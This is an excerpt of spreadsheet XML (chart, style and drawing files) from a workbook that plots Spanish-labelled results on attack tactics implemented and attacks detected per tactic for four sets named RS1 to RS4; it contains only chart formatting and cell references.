                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="1" sz="1600">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$Y$31:$AB$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$Y$48:$AB$48</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="716346456"/>
        <c:axId val="423281532"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="71634645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423281532"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="42328153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PORCENTAJE TP RESPECTO A TOTAL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16346456"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>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PORCENTAJES TÁCTICAS IMPLEMENTADAS (TÉCNICAS)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pie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Pt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7ED1D7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="12"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="B3CEFB"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</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sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>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PORCENTAJES TÁCTICAS IMPLEMENTADAS (ATAQUES)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados'!$V$8:$V$9</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Pt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7ED1D7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="12"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="B3CEFB"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</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000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>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ATAQUES DETECTADOS POR TÁCTICA - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$R$10:$R$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="244286450"/>
        <c:axId val="1097894729"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="24428645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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1097894729"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1097894729"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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44286450"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>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ATAQUES DETECTADOS POR TÁCTICA - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$S$10:$S$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="605189044"/>
        <c:axId val="1452345814"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="60518904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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1452345814"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1452345814"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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05189044"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>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ATAQUES DETECTADOS POR TÁCTICA - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$T$10:$T$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1507171359"/>
        <c:axId val="1767262798"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="150717135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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1767262798"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1767262798"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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07171359"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>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black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>ATAQUES DETECTADOS POR TÁCTICA - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Ataques Detectados</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$U$10:$U$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$V$10:$V$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1711244756"/>
        <c:axId val="1684206234"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="171124475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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1684206234"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1684206234"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="24.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11244756"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chartEx1.xml><?xml version="1.0" encoding="utf-8"?>
<cx:chartSpace xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:c14="http://schemas.microsoft.com/office/drawing/2007/8/2/chart">
  <cx:chartData>
    <cx:data id="0">
      <cx:numDim type="val">
        <cx:f dir="row">'(D) - Resultados'!$C$10:$F$10</cx:f>
      </cx:numDim>
      <cx:strDim type="cat">
        <cx:f>'(D) - Resultados'!$C$9:$F$9</cx:f>
      </cx:strDim>
    </cx:data>
  </cx:chartData>
  <cx:chart>
    <cx:plotArea>
      <cx:plotAreaRegion>
        <cx:series layoutId="waterfall" uniqueId="{5570B3C5-FA1B-4E03-94BE-9AA764B9B73B}">
          <cx:dataId val="0"/>
          <cx:layoutPr>
            <cx:visibility connectorLines="1"/>
            <cx:subtotals/>
          </cx:layoutPr>
        </cx:series>
      </cx:plotAreaRegion>
      <cx:axis id="0">
        <cx:catScaling gapWidth="auto"/>
        <cx:title>
          <cx:txPr>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t/>
              </a:r>
            </a:p>
          </cx:txPr>
        </cx:title>
        <cx:tickLabels/>
      </cx:axis>
      <cx:axis id="1">
        <cx:valScaling max="auto" min="auto"/>
        <cx:title>
          <cx:txPr>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t/>
              </a:r>
            </a:p>
          </cx:txPr>
        </cx:title>
        <cx:majorGridlines>
          <cx:spPr>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B7B7B7"/>
              </a:solidFill>
            </a:ln>
          </cx:spPr>
        </cx:majorGridlines>
        <cx:minorGridlines>
          <cx:spPr>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="CCCCCC">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </cx:spPr>
        </cx:minorGridlines>
        <cx:tickLabels/>
      </cx:axis>
    </cx:plotArea>
  </cx:chart>
</cx:chartSpace>
</file>

<file path=xl/charts/colors1.xml><?xml version="1.0" encoding="utf-8"?>
<cs:colorStyle xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" meth="cycle" id="10">
  <a:srgbClr val="4285F4"/>
  <a:srgbClr val="DB4437"/>
  <a:srgbClr val="BDBDBD"/>
</cs:colorStyle>
</file>

<file path=xl/charts/style1.xml><?xml version="1.0" encoding="utf-8"?>
<cs:chartStyle xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" id="395">
  <cs:axisTitle>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:axisTitle>
  <cs:categoryAxis>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:categoryAxis>
  <cs:chartArea>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
    <cs:spPr>
      <a:solidFill>
        <a:srgbClr val="FFFFFF"/>
      </a:solidFill>
      <a:ln cap="flat" cmpd="sng" w="9525" algn="ctr">
        <a:solidFill>
          <a:srgbClr val="000000"/>
        </a:solidFill>
      </a:ln>
    </cs:spPr>
  </cs:chartArea>
  <cs:dataLabel>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataLabel>
  <cs:dataLabelCallout>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataLabelCallout>
  <cs:dataPoint>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0">
      <cs:styleClr val="isAuto"/>
    </cs:fillRef>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
    <cs:spPr>
      <a:solidFill>
        <a:schemeClr val="phClr"/>
      </a:solidFill>
    </cs:spPr>
  </cs:dataPoint>
  <cs:dataPoint3D>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPoint3D>
  <cs:dataPointLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPointLine>
  <cs:dataPointMarker>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPointMarker>
  <cs:dataPointWireframe>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPointWireframe>
  <cs:dataTable>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataTable>
  <cs:downBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:downBar>
  <cs:dropLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dropLine>
  <cs:errorBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:errorBar>
  <cs:floor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:floor>
  <cs:gridlineMajor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:gridlineMajor>
  <cs:gridlineMinor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:gridlineMinor>
  <cs:hiLoLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:hiLoLine>
  <cs:leaderLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:leaderLine>
  <cs:legend>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:legend>
  <cs:plotArea>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:plotArea>
  <cs:plotArea3D>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:plotArea3D>
  <cs:seriesAxis>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:seriesAxis>
  <cs:seriesLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:seriesLine>
  <cs:title>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:title>
  <cs:trendline>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:trendline>
  <cs:trendlineLabel>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:trendlineLabel>
  <cs:upBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:upBar>
  <cs:valueAxis>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:valueAxis>
  <cs:wall>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:wall>
</cs:chartStyle>
</file>

<file path=xl/drawings/_rels/drawing4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart11.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart10.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart13.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart12.xml"/><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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart9.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart14.xml"/><Relationship Id="rId14" Type="http://schemas.microsoft.com/office/2014/relationships/chartEx" Target="../charts/chartEx1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart16.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart5.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart6.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart7.xml"/><Relationship Id="rId8"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47625</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="1"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10</xdr:col>
      <xdr:colOff>47625</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="2" name="Chart 2" title="Gráfico"/>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10</xdr:col>
      <xdr:colOff>47625</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="3" name="Chart 3" title="Gráfico"/>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10</xdr:col>
      <xdr:colOff>47625</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="4" name="Chart 4" title="Gráfico"/>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9</xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>110</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="5" name="Chart 5" title="Gráfico"/>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9</xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>135</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
